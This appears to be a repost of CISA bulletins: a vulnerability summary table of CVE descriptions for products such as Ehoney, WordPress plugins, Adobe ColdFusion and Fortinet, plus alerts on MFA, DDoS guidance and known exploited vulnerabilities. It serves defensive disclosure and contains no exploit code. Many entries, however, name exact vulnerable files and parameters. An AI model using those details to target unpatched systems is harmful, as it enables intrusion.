seccome — ehoney	A vulnerability, which was classified as critical, has been found in seccome Ehoney. This issue affects some unknown processing of the file /api/v1/attack. The manipulation of the argument AttackIP leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-212411.	2022-10-28	not yet calculated	CVE-2022-3729 N/A
seccome — ehoney	A vulnerability, which was classified as critical, was found in seccome Ehoney. Affected is an unknown function of the file /api/v1/attack/falco. The manipulation of the argument Payload leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-212412.	2022-10-28	not yet calculated	CVE-2022-3730 N/A
seccome — ehoney	A vulnerability has been found in seccome Ehoney and classified as critical. Affected by this vulnerability is an unknown functionality of the file /api/v1/attack/token. The manipulation of the argument Payload leads to sql injection. The attack can be launched remotely. The identifier VDB-212413 was assigned to this vulnerability.	2022-10-28	not yet calculated	CVE-2022-3731 N/A
seccome — ehoney	A vulnerability was found in seccome Ehoney and classified as critical. Affected by this issue is some unknown functionality of the file /api/v1/bait/set. The manipulation of the argument Payload leads to sql injection. The attack may be launched remotely. VDB-212414 is the identifier assigned to this vulnerability.	2022-10-28	not yet calculated	CVE-2022-3732 N/A
seccome — ehoney	A vulnerability was found in seccome Ehoney. It has been rated as critical. This issue affects some unknown processing of the file /api/public/signup. The manipulation leads to improper access controls. The identifier VDB-212417 was assigned to this vulnerability.	2022-10-28	not yet calculated	CVE-2022-3735 N/A
snyk — joyqi/hyper-down	The package joyqi/hyper-down from 0.0.0 are vulnerable to Cross-site Scripting (XSS) because the module of parse markdown does not filter the href attribute very well.	2022-10-26	not yet calculated	CVE-2022-25849 CONFIRM
sourcecodester — web-based_student_clearance_system	A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. This affects an unknown part of the file Admin/edit-admin.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212415.	2022-10-28	not yet calculated	CVE-2022-3733 N/A N/A
stimulsoft — stimulsoft	Stimulsoft (aka Stimulsoft Reports) 2013.1.1600.0, when Compilation Mode is used, allows an attacker to execute arbitrary C# code on any machine that renders a report, including the application server or a user’s local machine, as demonstrated by System.Diagnostics.Process.Start.	2022-10-29	not yet calculated	CVE-2021-42777 MISC
vmware — cloud_foundation	VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.	2022-10-28	not yet calculated	CVE-2022-31678 MISC
wasm-interp — wasm-interp	wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component OnReturnCallExpr->GetReturnCallDropKeepCount.	2022-10-28	not yet calculated	CVE-2022-43280 MISC
wasm-interp — wasm-interp	wasm-interp v1.0.29 was discovered to contain a heap overflow via the component std::vector<wabt::Type, std::allocator<wabt::Type>>::size() at /bits/stl_vector.h.	2022-10-28	not yet calculated	CVE-2022-43281 MISC
wasm-interp — wasm-interp	wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component OnReturnCallIndirectExpr->GetReturnCallDropKeepCount.	2022-10-28	not yet calculated	CVE-2022-43282 MISC
wasm2c — wasm2c	wasm2c v1.0.29 was discovered to contain an abort in CWriter::Write.	2022-10-28	not yet calculated	CVE-2022-43283 MISC
wireshark — wireshark	Crash in the OPUS protocol dissector in Wireshark 3.6.0 to 3.6.8 allows denial of service via packet injection or crafted capture file	2022-10-27	not yet calculated	CVE-2022-3725 MISC MISC CONFIRM
withsecure — f-secure_policy_manager	Reflected cross-site scripting (XSS) vulnerabilities in WithSecure through 2022-08-10) exists within the F-Secure Policy Manager due to an unvalidated parameter in the endpoint, which allows remote attackers to provide a malicious input.	2022-10-25	not yet calculated	CVE-2022-38162 MISC MISC MISC
wordpress — wordpress	Auth. (editor+) Reflected Cross-Site Scripting (XSS) vulnerability in ExpressTech Quiz And Survey Master plugin <= 7.3.4 on WordPress.	2022-10-28	not yet calculated	CVE-2021-36864 CONFIRM CONFIRM
wordpress — wordpress	Auth. SQL Injection (SQLi) vulnerability in Quiz And Survey Master plugin <= 7.3.4 on WordPress.	2022-10-28	not yet calculated	CVE-2021-36898 CONFIRM CONFIRM
wordpress — wordpress	The demon image annotation plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.7. This is due to missing nonce validation in the ~/includes/settings.php file. This makes it possible for unauthenticated attackers to modify the plugin’s settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.	2022-10-28	not yet calculated	CVE-2022-2864 MISC MISC MISC
wordpress — wordpress	The Bricks theme for WordPress is vulnerable to remote code execution due to the theme allowing site editors to include executable code blocks in website content in versions 1.2 to 1.5.3. This, combined with the missing authorization vulnerability (CVE-2022-3400), makes it possible for authenticated attackers with minimal permissions, such as a subscriber, can edit any page, post, or template on the vulnerable WordPress website and inject a code execution block that can be used to achieve remote code execution.	2022-10-28	not yet calculated	CVE-2022-3401 MISC MISC
wordpress — wordpress	The Log HTTP Requests plugin for WordPress is vulnerable to Stored Cross-Site Scripting via logged HTTP requests in versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers who can trick a site’s administrator into performing an action like clicking on a link, or an authenticated user with access to a page that sends a request using user-supplied data via the server, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.	2022-10-28	not yet calculated	CVE-2022-3402 MISC MISC MISC
wordpress — wordpress	The Web Stories plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including 1.24.0 due to insufficient validation of URLs supplied via the ‘url’ parameter found via the /v1/hotlink/proxy REST API Endpoint. This made it possible for authenticated users to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.	2022-10-28	not yet calculated	CVE-2022-3708 MISC MISC MISC MISC
wordpress — wordpress	Cross-Site Request Forgery (CSRF) vulnerability in ThemeFusion Avada premium theme versions <= 7.8.1 on WordPress leading to arbitrary plugin installation/activation.	2022-10-27	not yet calculated	CVE-2022-41996 CONFIRM CONFIRM CONFIRM

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

CISA Releases Guidance on Phishing-Resistant and Numbers Matching Multifactor Authentication

Post author By admin
Post date October 31, 2022

Original release date: October 31, 2022

CISA has released two fact sheets to highlight threats against accounts and systems using certain forms of multifactor authentication (MFA). CISA strongly urges all organizations to implement phishing-resistant MFA to protect against phishing and other known cyber threats. If an organization using mobile push-notification-based MFA is unable to implement phishing-resistant MFA, CISA recommends using number matching to mitigate MFA fatigue. Although number matching is not as strong as phishing-resistant MFA, it is one of best interim mitigation for organizations who may not immediately be able to implement phishing-resistant MFA.

CISA recommends users and organizations see CISA fact sheets Implementing Phishing-Resistant MFA and Implementing Number Matching in MFA Applications. Visit CISA.gov/MFA for more information on MFA, including an infographic of the hierarchy of MFA options.

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

Joint CISA FBI MS-ISAC Guide on Responding to DDoS Attacks and DDoS Guidance for Federal Agencies

Post author By admin
Post date October 28, 2022

Original release date: October 28, 2022

CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have released Understanding and Responding to Distributed Denial-of-Service Attacks provide organizations proactive steps to reduce the likelihood and impact of distributed denial-of-service (DDoS) attacks. The guidance is for both network defenders and leaders to help them understand and respond to DDoS attacks, which can cost an organization time, money, and reputational damage.

Concurrently, CISA has released Capacity Enhancement Guide (CEG): Additional DDoS Guidance for Federal Agencies, which provides federal civilian executive branch (FCEB) agencies additional DDoS guidance, including recommended FCEB contract vehicles and services that provide DDoS protection and mitigations.

CISA encourages all network defenders and leaders to review:

Joint guide: Understanding and Responding to Distributed Denial-of-Service Attacks
- https://www.cisa.gov/sites/default/files/publications/understanding-and-responding-to-ddos-attacks_508c.pdf
CEG: Additional DDoS Guidance for Federal Agencies
- https://www.cisa.gov/sites/default/files/publications/ceg-additional-ddos-guidance-for-federal-agencies_508c.pdf
Tip: Understanding Denial-of-Service Attacks
- https://www.cisa.gov/uscert/ncas/tips/ST04-015

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

CISA Adds Six Known Exploited Vulnerabilities to Catalog

Post author By admin
Post date October 24, 2022

Original release date: October 24, 2022

CISA has added six vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow in the “Date Added to Catalog” column, which will sort by descending dates.   

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.   

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the specified criteria.   

This product is provided subject to this Notification and this Privacy & Use policy.

alerts

Vulnerability Summary for the Week of October 17, 2022

Post author By admin
Post date October 24, 2022

Original release date: October 24, 2022

High Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
74cms — 74cmsse	An arbitrary file upload vulnerability in the component /apiadmin/upload/attach of 74cmsSE v3.13.0 allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-17	9.8	CVE-2022-42154 MISC
acer — altos_w2000h-w570h_f4_firmware	Acer Altos W2000h-W570h F4 R01.03.0018 was discovered to contain a stack overflow in the RevserveMem component. This vulnerability allows attackers to cause a Denial of Service (DoS) via injecting crafted shellcode into the NVRAM variable.	2022-10-19	9.8	CVE-2022-41415 MISC MISC MISC
adobe — acrobat_reader_dc	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38450 MISC
adobe — acrobat_reader_dc	Adobe Acrobat Reader versions 22.002.20212 (and earlier) and 20.005.30381 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-42339 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35690 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35710 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35711 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, the vulnerability is triggered when a crafted network packet is sent to the server.	2022-10-14	9.8	CVE-2022-35712 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.	2022-10-14	9.8	CVE-2022-38418 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-38419 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by a Use of Hard-coded Credentials vulnerability that could result in application denial-of-service by gaining access to start/stop arbitrary services. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-38420 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in information disclosure. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-38422 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-42340 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary file system read. Exploitation of this issue does not require user interaction.	2022-10-14	7.5	CVE-2022-42341 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, but does require administrator privileges.	2022-10-14	7.2	CVE-2022-38421 MISC
adobe — coldfusion	Adobe ColdFusion versions Update 14 (and earlier) and Update 4 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability that could result in arbitrary file system write. Exploitation of this issue does not require user interaction, but does require administrator privileges.	2022-10-14	7.2	CVE-2022-38424 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38440 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38441 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38442 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38444 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38445 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38446 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38447 MISC
adobe — dimension	Adobe Dimension versions 3.4.5 is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2022-10-14	7.8	CVE-2022-38448 MISC
aethon — tug_home_base_server	Aethon TUG Home Base Server versions prior to version 24 are affected by un unauthenticated attacker who can freely access hashed user credentials.	2022-10-21	8.2	CVE-2022-1066 MISC
aethon — tug_home_base_server	Aethon TUG Home Base Server versions prior to version 24 are affected by un unauthenticated attacker who can freely access hashed user credentials.	2022-10-21	8.1	CVE-2022-1070 MISC
aethon — tug_home_base_server	Aethon TUG Home Base Server versions prior to version 24 are affected by un unauthenticated attacker who can freely access hashed user credentials.	2022-10-21	7.5	CVE-2022-26423 MISC
anji-plus — report	anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens.	2022-10-17	8.8	CVE-2022-42983 MISC MISC
apache — dubbo	A deserialization vulnerability existed in dubbo hessian-lite 3.2.12 and its earlier versions, which could lead to malicious code execution. This issue affects Apache Dubbo 2.7.x version 2.7.17 and prior versions; Apache Dubbo 3.0.x version 3.0.11 and prior versions; Apache Dubbo 3.1.x version 3.1.0 and prior versions.	2022-10-18	9.8	CVE-2022-39198 MISC
asus — asusswitch	AsusSwitch.exe on ASUS personal computers (running Windows) sets weak file permissions, leading to local privilege escalation (this also can be used to delete files within the system arbitrarily). This affects ASUS System Control Interface 3 before 3.1.5.0, and AsusSwitch.exe before 1.0.10.0.	2022-10-18	7.8	CVE-2022-36438 MISC MISC
atlassian — jira_align	The MasterUserEdit API in Atlassian Jira Align Server before version 10.109.2 allows An authenticated attacker with the People role permission to use the MasterUserEdit API to modify any users role to Super Admin. This vulnerability was reported by Jacob Shafer from Bishop Fox.	2022-10-14	8.8	CVE-2022-36803 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42936 MISC
autodesk — autocad_plant_3d	A malicious crafted .dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42937 MISC
autodesk — autocad_plant_3d	A malicious crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42938 MISC
autodesk — autocad_plant_3d	A malicious crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42939 MISC
autodesk — autocad_plant_3d	A malicious crafted TGA file when consumed through DesignReview.exe application could lead to memory corruption vulnerability. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42940 MISC
autodesk — autocad_plant_3d	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42941 MISC
autodesk — autocad_plant_3d	A malicious crafted dwf or .pct file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-21	7.8	CVE-2022-42942 MISC
autodesk — design_review	A maliciously crafted PCT file when consumed through DesignReview.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	7.8	CVE-2022-41306 MISC
autodesk — fbx_software_development_kit	An Out-Of-Bounds Read Vulnerability in Autodesk FBX SDK version 2020. and prior may lead to code execution or information disclosure through maliciously crafted FBX files. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	7.8	CVE-2022-41302 MISC
autodesk — fbx_software_development_kit	A user may be tricked into opening a malicious FBX file which may exploit a use-after-free vulnerability in Autodesk FBX SDK 2020 version causing the application to reference a memory location controlled by an unauthorized third party, thereby running arbitrary code on the system.	2022-10-14	7.8	CVE-2022-41303 MISC
autodesk — fbx_software_development_kit	An Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 version and prior may lead to code execution through maliciously crafted FBX files or information disclosure.	2022-10-14	7.8	CVE-2022-41304 MISC
autodesk — subassembly_composer	A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	7.8	CVE-2022-41305 MISC
autodesk — subassembly_composer	A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	7.8	CVE-2022-41307 MISC
autodesk — subassembly_composer	A maliciously crafted PKT file when consumed through SubassemblyComposer.exe application could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.	2022-10-14	7.8	CVE-2022-41308 MISC
avira — avira_security	A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.	2022-10-17	8.8	CVE-2022-3368 MISC
best_student_result_management_system_project — best_student_result_management_system	Best Student Result Management System v1.0 is vulnerable to SQL Injection via /upresult/upresult/notice-details.php?nid=.	2022-10-20	9.8	CVE-2022-42021 MISC
billing_system_project — billing_system	Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /phpinventory/editbrand.php.	2022-10-17	7.2	CVE-2022-41498 MISC
billing_system_project — billing_system	An arbitrary file upload vulnerability in the component /php_action/editProductImage.php of Billing System Project v1.0 allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-18	7.2	CVE-2022-41504 MISC
boxbilling — boxbilling	Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1.	2022-10-17	7.2	CVE-2022-3552 CONFIRM MISC
canteen_management_system_project — canteen_management_system	A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument business leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211192.	2022-10-18	9.8	CVE-2022-3583 MISC MISC
canteen_management_system_project — canteen_management_system	A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211193 was assigned to this vulnerability.	2022-10-18	8.8	CVE-2022-3584 MISC MISC
cashier_queuing_system_project — cashier_queuing_system	A vulnerability classified as critical was found in SourceCodester Cashier Queuing System 1.0. This vulnerability affects unknown code of the file /queuing/login.php of the component Login Page. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-211186 is the identifier assigned to this vulnerability.	2022-10-18	8.8	CVE-2022-3579 MISC MISC
chamilo — chamilo	Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to ‘big file uploads’ to copy/move files from anywhere in the file system into the web directory.	2022-10-17	8.8	CVE-2022-42029 MISC
changingtec — rava_certificate_validation_system	RAVA certificate validation system has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL command to access, modify and delete database.	2022-10-18	9.8	CVE-2022-39056 MISC
changingtec — rava_certificate_validation_system	RAVA certification validation system has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and access arbitrary system files.	2022-10-18	7.5	CVE-2022-39058 MISC
changingtec — rava_certificate_validation_system	RAVA certificate validation system has insufficient filtering for special parameter of the web page input field. A remote attacker with administrator privilege can exploit this vulnerability to perform arbitrary system command and disrupt service.	2022-10-18	7.2	CVE-2022-39057 MISC
codexpert — search_logger	The Search Logger WordPress plugin through 0.9 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users	2022-10-17	7.2	CVE-2022-3131 MISC
devexpress — asp.net_web_forms_controls	The DevExpress Resource Handler (ASPxHttpHandlerModule) in DevExpress ASP.NET Web Forms Build v19.2.3 does not verify the referenced objects in the /DXR.axd?r= HTTP GET parameter. This leads to an Insecure Direct Object References (IDOR) vulnerability which allows attackers to access the application source code.	2022-10-18	7.5	CVE-2022-41479 MISC
djangoproject — django	In Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a potential denial of service attack via the locale parameter, which is treated as a regular expression.	2022-10-16	7.5	CVE-2022-41323 MISC MISC CONFIRM MISC
dlink — dir-878_firmware	D-Link DIR878 1.30B08 Hotfix_04 was discovered to contain a command injection vulnerability via the component /bin/proc.cgi.	2022-10-19	9.8	CVE-2022-43184 MISC MISC
dlink — dsl-2750b_firmware	D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022.	2022-10-19	9.8	CVE-2016-20017 MISC MISC MISC
emlog — emlog	Emlog Pro 1.6.0 plugins upload suffers from a remote code execution (RCE) vulnerability.	2022-10-21	7.2	CVE-2022-42189 MISC
eve-ng — eve-ng	An arbitrary file upload vulnerability in the apiImportLabs function in api_labs.php of EVE-NG 2.0.3-112 Community allows attackers to execute arbitrary code via a crafted UNL file.	2022-10-20	7.2	CVE-2022-31366 MISC MISC
exim — exim	A vulnerability was found in Exim and classified as problematic. This issue affects some unknown processing of the component Regex Handler. The manipulation leads to use after free. The name of the patch is 4e9ed49f8f12eb331b29bd5b6dc3693c520fddc2. It is recommended to apply a patch to fix this issue. The identifier VDB-211073 was assigned to this vulnerability.	2022-10-17	7.5	CVE-2022-3559 MISC MISC MISC
eyoucms — eyoucms	EyouCMS V1.5.9 was discovered to contain multiple Cross-Site Request Forgery (CSRF) vulnerabilities via the Members Center, Editorial Membership, and Points Recharge components.	2022-10-18	8.8	CVE-2022-41500 MISC
f5 — big-ip_access_policy_manager	In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.2, 15.1.x before 15.1.7, 14.1.x before 14.1.5.2, and 13.1.x before 13.1.5.1, when a sideband iRule is configured on a virtual server, undisclosed traffic can cause an increase in memory resource utilization.	2022-10-19	7.5	CVE-2022-41624 MISC
f5 — big-ip_advanced_firewall_manager	In versions 16.1.x before 16.1.3.2 and 15.1.x before 15.1.5.1, when BIG-IP AFM Network Address Translation policy with IPv6/IPv4 translation rules is configured on a virtual server, undisclosed requests can cause an increase in memory resource utilization.	2022-10-19	7.5	CVE-2022-41806 MISC
f5 — big-ip_analytics	In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, and 14.1.x before 14.1.5.1, when an LTM TCP profile with Auto Receive Window Enabled is configured on a virtual server, undisclosed traffic can cause the virtual server to stop processing new client connections.	2022-10-19	7.5	CVE-2022-36795 MISC
f5 — big-ip_application_security_manager	When a BIG-IP Advanced WAF/ASM security policy is configured on a virtual server, undisclosed requests can cause the bd process to terminate.	2022-10-19	7.5	CVE-2022-41691 MISC
f5 — big-ip_application_security_manager	In versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5.1, and 13.1.x before 13.1.5.1, When the Advanced WAF / ASM module is provisioned, an authenticated remote code execution vulnerability exists in the BIG-IP iControl REST interface.	2022-10-19	7.2	CVE-2022-41617 MISC
f5 — big-ip_local_traffic_manager	In BIG-IP versions 17.0.x before 17.0.0.1, 16.1.x before 16.1.3.1, 15.1.x before 15.1.6.1, 14.1.x before 14.1.5.1, and 13.1.x before 13.1.5.1, when DNS profile is configured on a virtual server with DNS Express enabled, undisclosed DNS queries with DNSSEC can cause TMM to terminate.	2022-10-19	7.5	CVE-2022-41787 MISC
f5 — nginx_plus	NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_hls_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its crash or potential other impact using a specially crafted audio or video file. The issue affects only NGINX Plus when the hls directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_hls_module.	2022-10-19	7	CVE-2022-41743 MISC
feishu — feishu	Beijing Feishu Technology Co., Ltd Feishu v3.40.3 was discovered to contain an untrusted search path vulnerability.	2022-10-18	7.8	CVE-2021-3305 MISC MISC MISC MISC
fortinet — fortios	A access of uninitialized pointer in Fortinet FortiOS version 7.2.0, 7.0.0 through 7.0.5, 6.4.0 through 6.4.8, 6.2.0 through 6.2.10, 6.0.x, FortiProxy version 7.0.0 through 7.0.4, 2.0.0 through 2.0.9, 1.2.x allows a remote unauthenticated or authenticated attacker to crash the sslvpn daemon via an HTTP GET request.	2022-10-18	7.5	CVE-2022-29055 CONFIRM
fortinet — fortiswitchmanager	An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.	2022-10-18	9.8	CVE-2022-40684 CONFIRM MISC
fortinet — fortitester	An improper neutralization of special elements used in an OS Command (‘OS Command Injection’) vulnerabilities [CWE-78] in Telnet login components of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated remote attacker to execute arbitrary command in the underlying shell.	2022-10-18	9.8	CVE-2022-33872 CONFIRM
